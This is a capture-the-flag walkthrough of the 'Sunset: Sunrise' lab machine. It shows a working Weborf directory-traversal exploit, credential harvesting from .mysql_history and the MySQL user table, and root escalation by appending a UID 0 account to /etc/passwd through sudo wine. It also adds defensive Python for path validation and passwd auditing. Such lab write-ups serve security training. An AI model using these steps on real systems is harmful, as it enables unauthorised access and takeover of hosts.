Sunset: Sunrise
Port recognition with nmap
┌──(root@ghost)-[/home/ghost]
└─# nmap -v -p- --open --min-rate 5000 sunrise.vuln -sV
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-29 12:50 EST
Scanning sunrise.vuln (10.0.2.63) [65535 ports]
Discovered open port 8080/tcp on 10.0.2.63
Discovered open port 22/tcp on 10.0.2.63
Discovered open port 3306/tcp on 10.0.2.63
Discovered open port 80/tcp on 10.0.2.63
Completed SYN Stealth Scan at 12:50, 1.47s elapsed (65535 total ports)
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
80/tcp open http nginx 1.14.2
3306/tcp open mysql?
8080/tcp open http-proxy Weborf (GNU/Linux)
┌──(root@ghost)-[/home/ghost]
└─# whatweb http://sunrise.vuln:8080
http://sunrise.vuln:8080 [200 OK] Country[RESERVED][ZZ], HTTPServer[Linux][Weborf (GNU/Linux)], IP[10.0.2.63], Title[Weborf]
Visiting http://sunrise.vuln:8080 in a browser shows the footer 'Generated by Weborf/0.12.2 (GNU/Linux)', which gives us the exact version.
┌──(root@ghost)-[/home/ghost]
└─# searchsploit weborf
------------------------------------------- ------------------------
 Exploit Title                             | Path
------------------------------------------- ------------------------
weborf 0.12.2 - Directory Traversal        | linux/remote/14925.txt
------------------------------------------- ------------------------
┌──(root@ghost)-[/home/ghost]
└─# cat /usr/share/exploitdb/exploits/linux/remote/14925.txt
Title: Weborf httpd <= 0.12.2 Directory Traversal Vulnerability
Date: Sep 6, 2010
Author: Rew
Link: http://galileo.dmi.unict.it/wiki/weborf/doku.php
Version: 0.12.2
Tested On: Debian 5
CVE: N/A
=============================================================
Weborf httpd <= 0.12.2 suffers a directory traversal
vulnerability. This vulnerability could allow
attackers to read arbitrary files and hak th3 plan3t.
instance.c : line 240-244
------------------------------
void modURL(char* url) {
//Prevents the use of .. to access the whole filesystem <-- ORLY?
strReplace(url,"../",'\0');
replaceEscape(url);
------------------------------
Exploit: GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
==============================================================
Stay safe,
Over and Out
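As an added illustration (not Weborf's code and not part of the original writeup): a Python re-creation of the order of operations the advisory quotes, where the literal '../' is stripped before percent-decoding, beside a decode-then-canonicalize check that rejects the same request. DOCROOT is an assumed path.

```python
import posixpath
import urllib.parse

DOCROOT = "/var/www/weborf"  # assumed document root, not taken from the writeup

def modurl_like(url: str) -> str:
    """Re-creation of the advisory's order of operations: the literal
    substring '../' is removed BEFORE the URL is percent-decoded, so an
    encoded '..%2f' survives the filter and only becomes '../' afterwards."""
    stripped = url.replace("../", "")
    return urllib.parse.unquote(stripped)

def resolve_vulnerable(url: str) -> str:
    """Path a server ends up opening after modurl_like() and a plain join."""
    return posixpath.normpath(DOCROOT + "/" + modurl_like(url))

def resolve_hardened(url: str):
    """Decode first, canonicalize, then verify the result is still under
    DOCROOT. Returns None for any request that escapes the document root."""
    decoded = urllib.parse.unquote(url)
    if "\x00" in decoded:  # a NUL byte would truncate the path in a C server
        return None
    candidate = posixpath.normpath(posixpath.join(DOCROOT, decoded.lstrip("/")))
    if candidate != DOCROOT and not candidate.startswith(DOCROOT + "/"):
        return None
    return candidate

# The request from the advisory (encoded slashes, no literal '../')
TRAVERSAL = "/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"

if __name__ == "__main__":
    print(resolve_vulnerable(TRAVERSAL))            # /etc/passwd
    print(resolve_vulnerable("/../../etc/passwd"))  # literal form is caught
    print(resolve_hardened(TRAVERSAL))              # None
    print(resolve_hardened("/index.html"))          # /var/www/weborf/index.html
```

The literal '/../../etc/passwd' form is neutralised by the substring filter; only the containment check after decoding stops the encoded variant.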
┌──(root@ghost)-[/home/ghost]
└─# curl http://sunrise.vuln:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
avahi:x:107:117:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
saned:x:108:118::/var/lib/saned:/usr/sbin/nologin
colord:x:109:119:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:110:7:HPLIP system user,,,:/var/run/hplip:/bin/false
sunrise:x:1000:1000:sunrise,,,:/home/sunrise:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
uuidd:x:111:120::/run/uuidd:/usr/sbin/nologin
rtkit:x:112:121:RealtimeKit,,,:/proc:/usr/sbin/nologin
dnsmasq:x:113:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
pulse:x:114:122:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
usbmux:x:115:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
geoclue:x:116:124::/var/lib/geoclue:/usr/sbin/nologin
tss:x:117:125:TPM2 software stack,,,:/var/lib/tpm:/bin/false
speech-dispatcher:x:118:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
lightdm:x:120:127:Light Display Manager:/var/lib/lightdm:/bin/false
weborf:x:1001:1001:,,,:/home/weborf:/bin/bash
mysql:x:121:128:MySQL Server,,,:/nonexistent:/bin/false
Using a browser we can also list files and browse the indexed directories.
┌──(root@ghost)-[/home/ghost]
└─# curl http://sunrise.vuln:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fsunrise%2fuser.txt
a6050aecf6303b0b824038807d823a89
From here we can obtain the user flag.
┌──(root@ghost)-[/home/ghost]
└─# wfuzz -t 100 -c --hc=404 -w /usr/share/dirb/wordlists/common.txt -u "http://sunrise.vuln:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2fFUZZ"
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://sunrise.vuln:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2fFUZZ
Total requests: 4614
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 200 2 L 18 W 439 Ch "http://sunrise.vuln:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f"
000000003: 200 113 L 483 W 3526 Ch ".bashrc"
000000016: 200 2 L 8 W 83 Ch ".mysql_history"
000000019: 200 27 L 130 W 807 Ch ".profile"
After fuzzing weborf's home directory with a wordlist we found the .mysql_history file.
┌──(root@ghost)-[/home/ghost]
└─# curl "http://sunrise.vuln:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f.mysql_history"
show databases;
ALTER USER 'weborf'@'localhost' IDENTIFIED BY 'iheartrainbows44';
We found credentials for the local MySQL database; maybe weborf reuses the same password for SSH.
┌──(root@ghost)-[/home/ghost]
└─# ssh weborf@sunrise.vuln
weborf@sunrise.vuln's password:
Linux sunrise 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Dec 5 16:24:32 2019 from 192.168.1.146
weborf@sunrise:~$
We are now the weborf user.
┌──(root@ghost)-[/home/ghost]
└─# mysql mysql -u weborf -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 69
Server version: 10.3.18-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> select User,Password from mysql.user;
+---------+-------------------------------------------+
| User | Password |
+---------+-------------------------------------------+
| root | *C7B6683EEB8FF8329D8390574FAA04DD04B87C58 |
| sunrise | thefutureissobrightigottawearshades |
| weborf | *A76018C6BB42E371FD7B71D2EC6447AE6E37DB28 |
+---------+-------------------------------------------+
After checking the whole database we found the sunrise user's password stored in clear text.
weborf@sunrise:~$ su sunrise
Password:
sunrise@sunrise:/home/weborf$
And we can pivot to the sunrise user.
sunrise@sunrise:/home/weborf$ sudo -l
[sudo] password for sunrise:
Matching Defaults entries for sunrise on sunrise:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User sunrise may run the following commands on sunrise:
(root) /usr/bin/wine
We can see that sunrise can execute /usr/bin/wine as the root user.
sunrise@sunrise:/home/weborf$ sudo -u root /usr/bin/wine cmd
Microsoft Windows 5.2.3790 (4.0)
Z:\home\weborf>type Z:\root\root.txt
(ASCII-art sunrise banner from root.txt; layout lost in extraction)
Thanks for playing! - Felipe Winsnes (@whitecr0wz)
24edb59d21c273c033aa6f1689b0b18c
And here is the root flag.
To break out of the wine context and take advantage of the root privileges, we can append a new UID 0 user to /etc/passwd.
┌──(root@ghost)-[/home/ghost]
└─# openssl passwd -1 -salt ghost root
$1$ghost$hei4EuMz/wBkKFXDT2bQT0
Generating the password hash
┌──(root@ghost)-[/home/ghost]
└─# cat gowcroot.bat
echo|set /p=ghost:$1$ghost$hei4EuMz/wBkKFXDT2bQT0:0:0:root:/root:/bin/bash>>\etc\passwd
Wine payload
sunrise@sunrise:~$ sudo -u root /usr/bin/wine cmd
Microsoft Windows 5.2.3790 (4.0)
Z:\home\sunrise>echo|set /p=ghost:$1$ghost$hei4EuMz/wBkKFXDT2bQT0:0:0:root:/root:/bin/bash>>\etc\passwd
Z:\home\sunrise>exit
sunrise@sunrise:~$ su ghost
Password:
root@sunrise:/home/sunrise#
And we are root.
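A defender-side check for the change made above, as an added example that is not part of the writeup: it scans /etc/passwd-style lines for extra UID 0 accounts and for password hashes stored inline instead of in /etc/shadow. The sample content is constructed, with the ghost line from the writeup as its last entry.

```python
import re

# Constructed sample in /etc/passwd format (not captured from a live host). The
# stock entries are abbreviated; the last line is the one appended through wine.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sunrise:x:1000:1000:sunrise,,,:/home/sunrise:/bin/bash
weborf:x:1001:1001:,,,:/home/weborf:/bin/bash
ghost:$1$ghost$hei4EuMz/wBkKFXDT2bQT0:0:0:root:/root:/bin/bash
"""

# crypt(3)-style hash "$<id>$..." as produced by `openssl passwd -1` ($1$ = MD5-crypt)
HASH_RE = re.compile(r"^\$[0-9a-z]+\$")

def audit_passwd(text: str) -> list:
    """Return (account, reason) pairs for entries worth a second look:
    extra UID 0 accounts, and password fields that are not the 'x' shadow marker."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((f"line {lineno}", "malformed entry"))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if uid == "0" and name != "root":
            findings.append((name, "extra UID 0 account"))
        if HASH_RE.match(pw):
            findings.append((name, "password hash stored in /etc/passwd instead of /etc/shadow"))
        elif pw == "":
            findings.append((name, "empty password field"))
    return findings

if __name__ == "__main__":
    for account, reason in audit_passwd(SAMPLE_PASSWD):
        print(f"{account}: {reason}")
```

The same two findings would also be raised by auditd or a file-integrity monitor watching /etc/passwd for writes; this script is the offline equivalent for a captured copy.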